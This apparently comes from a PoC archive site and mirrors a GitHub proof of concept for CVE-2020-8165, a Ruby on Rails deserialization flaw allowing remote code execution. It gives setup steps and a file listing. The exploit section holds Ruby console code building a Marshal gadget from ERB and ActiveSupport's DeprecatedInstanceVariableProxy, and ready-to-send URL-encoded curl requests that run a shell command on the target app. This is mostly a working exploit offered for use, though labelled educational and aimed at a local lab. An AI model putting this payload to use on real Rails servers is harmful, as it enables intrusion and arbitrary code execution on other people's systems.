CVE-2020-8165 PoC — Ruby on Rails 代码问题漏洞

Source

https://github.com/masahiro331/CVE-2020-8165

Associated Vulnerability

Title:Ruby on Rails 代码问题漏洞 (CVE-2020-8165)
Description:Ruby on Rails是Rails团队的一套基于Ruby语言的开源Web应用框架。 Ruby on Rails 5.2.5之前版本和6.0.4之前版本中存在代码问题漏洞。攻击者可利用该漏洞将不受信任的Ruby对象注入到Web应用程序，执行代码或造成其他危害。

Readme

## CVE-2020-8165 (Ruby on Rails)

For educational purposes only.

See Reference for the details.

![demo](imgs/rce.gif)

## Environment
Ruby: 2.6.3

Rails: 5.2.3

## Run
```
$ git clone https://github.com/masahiro331/CVE-2020-8165.git
$ bundle install --path vendor/bundle
$ bundle exec rails db:migrate
$ bundle exec rails s

# use redis
$ docker run -d -p 6379:6379 redis
```

## Exploit
```
$ bundle exec rails console

irb(main):> code = '`touch /tmp/rce`'
irb(main):> erb = ERB.allocate
irb(main):> erb.instance_variable_set :@src, code
irb(main):> erb.instance_variable_set :@filename, "1"
irb(main):> erb.instance_variable_set :@lineno, 1
irb(main):> payload Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
irb(main):>
irb(main):> puts "Payload"
irb(main):> require 'uri'
irb(main):> puts URI.encode_www_form(payload: payload)

$ curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%15%60touch+%2Ftmp%2Frce%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T'
$ curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%15%60touch+%2Ftmp%2Frce%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T'

Please 'curl' twice.
```

## References
https://groups.google.com/forum/#!topic/ruby-security-ann/OEWeyjD7NHY

File Snapshot


 [4.0K]  /data/pocs/cd9cdc0075fabc1663e6d952cf63b22b08177826
├── [4.0K]  app
│   ├── [4.0K]  channels
│   │   └── [4.0K]  application_cable
│   │       ├── [  79]  channel.rb
│   │       └── [  85]  connection.rb
│   ├── [4.0K]  controllers
│   │   ├── [  56]  application_controller.rb
│   │   ├── [4.0K]  concerns
│   │   └── [ 265]  users_controller.rb
│   ├── [4.0K]  jobs
│   │   └── [  43]  application_job.rb
│   ├── [4.0K]  mailers
│   │   └── [ 102]  application_mailer.rb
│   ├── [4.0K]  models
│   │   ├── [  78]  application_record.rb
│   │   ├── [4.0K]  concerns
│   │   └── [  35]  user.rb
│   └── [4.0K]  views
│       └── [4.0K]  layouts
│           ├── [ 229]  mailer.html.erb
│           └── [  13]  mailer.text.erb
├── [4.0K]  bin
│   ├── [ 125]  bundle
│   ├── [ 264]  rails
│   ├── [ 213]  rake
│   ├── [ 883]  setup
│   ├── [ 507]  spring
│   └── [ 745]  update
├── [4.0K]  config
│   ├── [1.2K]  application.rb
│   ├── [ 207]  boot.rb
│   ├── [ 195]  cable.yml
│   ├── [ 464]  credentials.yml.enc
│   ├── [ 594]  database.yml
│   ├── [ 128]  environment.rb
│   ├── [4.0K]  environments
│   │   ├── [1.9K]  development.rb
│   │   ├── [3.5K]  production.rb
│   │   └── [1.8K]  test.rb
│   ├── [4.0K]  initializers
│   │   ├── [ 216]  application_controller_renderer.rb
│   │   ├── [ 404]  backtrace_silencers.rb
│   │   ├── [ 504]  cors.rb
│   │   ├── [ 194]  filter_parameter_logging.rb
│   │   ├── [ 647]  inflections.rb
│   │   ├── [ 156]  mime_types.rb
│   │   └── [ 485]  wrap_parameters.rb
│   ├── [4.0K]  locales
│   │   └── [ 848]  en.yml
│   ├── [1.4K]  puma.rb
│   ├── [ 174]  routes.rb
│   ├── [ 111]  spring.rb
│   └── [1.1K]  storage.yml
├── [ 130]  config.ru
├── [4.0K]  db
│   ├── [4.0K]  migrate
│   │   └── [ 151]  20200520020238_create_users.rb
│   ├── [ 942]  schema.rb
│   └── [ 370]  seeds.rb
├── [1.4K]  Gemfile
├── [3.5K]  Gemfile.lock
├── [4.0K]  imgs
│   └── [1.7M]  rce.gif
├── [4.0K]  log
├── [4.0K]  public
│   └── [  98]  robots.txt
├── [ 227]  Rakefile
├── [1.7K]  README.md
├── [4.0K]  storage
├── [4.0K]  test
│   ├── [4.0K]  controllers
│   │   └── [ 794]  users_controller_test.rb
│   ├── [4.0K]  fixtures
│   │   ├── [4.0K]  files
│   │   └── [ 133]  users.yml
│   ├── [4.0K]  integration
│   ├── [4.0K]  mailers
│   ├── [4.0K]  models
│   │   └── [ 118]  user_test.rb
│   └── [ 290]  test_helper.rb
└── [4.0K]  tmp

30 directories, 51 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!